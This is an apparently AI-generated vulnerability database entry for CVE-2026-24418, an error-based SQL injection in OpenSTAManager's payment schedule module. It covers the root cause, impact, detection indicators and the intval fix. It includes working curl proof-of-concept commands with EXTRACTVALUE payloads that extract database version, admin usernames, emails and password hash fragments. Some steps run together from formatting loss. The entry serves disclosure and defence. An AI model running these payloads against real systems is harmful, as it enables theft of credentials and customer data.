
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-24418 is an error-based SQL injection vulnerability in the Scadenzario (Payment Schedule) bulk operations module of OpenSTAManager, an open-source ERP and field service management application. It affects OpenSTAManager versions 2.9.8 and earlier, allowing authenticated attackers to extract complete database contents — including user credentials, customer PII, and financial records — via XPATH error messages. The vulnerability was discovered by Łukasz Rybak, published on February 6, 2026, and carries a CVSS v4.0 base score of 8.7 (High) and a CVSS v3.1 base score of 6.5 (Medium) (GitHub Advisory, OSM Advisory).
The root cause is improper neutralization of SQL special elements (CWE-89) in /modules/scadenzario/bulk.php at line 88. User-supplied POST data (id_records[]) is processed by array_clean() in /lib/util.php, which only removes empty values and does not enforce integer type validation. The sanitized array is then passed directly to implode(',', $id_records) and concatenated into a raw SQL IN() clause without parameterization, enabling injection of arbitrary SQL. An attacker exploits this by submitting a crafted id_records[] element containing an EXTRACTVALUE()-based payload (e.g., id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT ...)))#) to leak data through MySQL XPATH error messages (OSM Advisory, GitHub Advisory).
Successful exploitation allows authenticated attackers to extract the entire database contents, including admin usernames, email addresses, bcrypt password hashes, customer personally identifiable information, and financial/payment schedule records. Because the injection occurs in a financial module, sensitive business data such as payment schedules and invoice references are directly at risk. Depending on database permissions, attackers may also be able to modify or delete records, and extracted credentials could enable further account takeover or lateral movement within the application (OSM Advisory, GitHub Advisory).
A public proof-of-concept (PoC) exploit with step-by-step curl commands is included in the GitHub Security Advisory and has been confirmed and tested on a live OpenSTAManager v2.9.8 instance. The EPSS score is approximately 0.015% (3rd percentile), and there is no evidence of active in-the-wild exploitation at this time. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires low-privilege authenticated access to the Scadenzario module (GitHub Advisory, OSM Advisory).
curl -c cookies.txt -X POST 'http://TARGET/index.php?op=login' -d 'username=USER&password=PASS'POST /actions.php?id_module=18 with the op=send_reminder operation and the id_records[] POST parameter.EXTRACTVALUE() to trigger an XPATH error that leaks data:curl -b cookies.txt -d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(USER(),' | ',VERSION()))))%23" "http://TARGET/actions.php?id_module=18"Expected response: XPATH syntax error: '~osm@localhost | 8.0.40-...'
4. Extract admin credentials: Modify the subquery to target the zz_users table:
curl -b cookies.txt -d "op=send_reminder&id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,':',email) FROM zz_users LIMIT 1)))%23" "http://TARGET/actions.php?id_module=18"SUBSTRING(password,1,31) and SUBSTRING(password,32,60) in successive requests to reconstruct the full bcrypt hash./actions.php?id_module=18 with op=send_reminder containing id_records[] values that include SQL keywords such as EXTRACTVALUE, CONCAT, SELECT, SUBSTRING, or hex-encoded strings (e.g., 0x7e)./actions.php?id_module=18 with URL-encoded SQL payloads (%23, %27, EXTRACTVALUE) in the request body; application error logs containing XPATH syntax error messages with data prefixed by ~.EXTRACTVALUE() or CONCAT() functions used within WHERE id IN (...) clauses on the co_scadenziario table; unexpected queries against zz_users or other sensitive tables originating from the web application user.XPATH syntax error: followed by database content such as usernames, emails, or version strings (OSM Advisory).No patched version has been officially released as of the advisory publication date — the advisory lists "None" for patched versions. The recommended fix is to apply type validation in /modules/scadenzario/bulk.php before the SQL query: add $id_records = array_map('intval', $id_records); followed by $id_records = array_filter($id_records, fn($id) => $id > 0); to ensure only positive integers are used in the IN() clause. As interim mitigations, restrict access to the Scadenzario module to only trusted users, deploy WAF rules to detect and block SQL injection patterns targeting /actions.php?id_module=18, and monitor database query logs for suspicious EXTRACTVALUE or CONCAT usage (GitHub Advisory, OSM Advisory).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."